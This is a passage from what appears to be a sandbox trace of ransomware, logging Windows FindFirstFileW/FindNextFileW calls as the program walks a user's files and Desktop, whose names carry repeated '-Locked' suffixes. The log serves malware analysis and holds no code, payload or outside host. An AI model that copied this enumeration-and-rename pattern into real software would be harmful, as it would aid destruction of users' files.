dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0309.914] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0309.914] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36130501, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36130501, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36130501, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0309.915] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0309.915] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361946b9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x361946b9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x361946b9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked", cAlternateFileName="HELJNZ~2.BMP")) returned 1 [0309.915] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0309.916] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3628d5d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3628d5d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3628d5d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0309.916] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0309.916] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362af9e1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362af9e1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362af9e1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0309.976] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0309.977] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362cf450, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362cf450, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362cf450, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked", cAlternateFileName="IZRQFJ~2.M4A")) returned 1 [0309.977] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0309.977] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3630777f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3630777f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked", cAlternateFileName="L0CW~1.DOC")) returned 1 [0309.977] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0309.978] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364167a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364167a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364167a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0309.978] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0309.978] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641ef6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3641ef6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3641ef6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0309.978] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0309.979] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36425180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36425180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36425180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked", cAlternateFileName="MYZQDK~2.MP3")) returned 1 [0309.979] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0309.979] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3642edd9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3642edd9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3642edd9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0309.980] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0309.980] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364363bc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364363bc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364363bc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked", cAlternateFileName="OQWYTP~2.BMP")) returned 1 [0309.980] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0309.980] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364439d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364439d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364439d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0309.981] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0309.981] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3644aec5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3644aec5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3644aec5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked", cAlternateFileName="SONI~2.JPG")) returned 1 [0309.981] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0309.981] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36452403, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36452403, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36452403, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked", cAlternateFileName="STLRGM~2.FLV")) returned 1 [0309.982] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0309.982] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364598c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364598c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364598c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked", cAlternateFileName="TMHBBP~2.MP4")) returned 1 [0309.982] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0309.982] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645fa98, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3645fa98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3645fa98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0309.983] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0309.983] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364649d0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364649d0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364649d0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0309.983] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0309.984] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36476736, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36476736, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36476736, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked", cAlternateFileName="VL-8WX~2.PNG")) returned 1 [0309.984] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0309.984] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3647dc3b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3647dc3b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3647dc3b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0309.985] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0309.985] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0309.986] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 0 [0309.986] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.987] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36718433, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36718433, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.987] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36718433, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36718433, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36702544, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36702544, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36702544, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~2.JPG")) returned 1 [0309.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3670d47e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3670d47e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3670d47e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked", 